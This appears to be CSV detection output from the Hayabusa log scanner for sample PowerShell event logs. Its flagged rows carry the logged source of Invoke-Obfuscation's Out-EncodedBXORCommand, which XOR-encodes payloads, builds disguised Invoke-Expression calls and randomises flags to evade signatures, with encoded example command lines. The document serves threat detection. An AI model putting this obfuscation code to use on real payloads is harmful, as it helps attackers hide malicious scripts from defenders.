$RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. 
If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,83 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 160 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. 
$HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. 
$Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 